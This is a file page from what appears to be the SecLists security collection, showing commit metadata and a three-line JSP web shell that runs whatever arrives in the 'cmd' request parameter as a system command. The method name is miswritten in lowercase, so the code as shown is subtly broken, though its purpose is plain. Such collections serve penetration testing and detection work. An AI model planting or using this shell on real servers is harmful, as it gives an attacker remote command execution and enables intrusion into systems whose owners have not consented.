SecLists/Web-Shells/JSP/simple-shell.jsp
Alexandre ZANNI 2affd894a4
fix file
remove what seems to be a git addition (`+`)
2019-03-11 17:12:47 +01:00

4 lines
63 B
Plaintext

<%
Runtime.getruntime().exec(request.getParameter("cmd"))
%>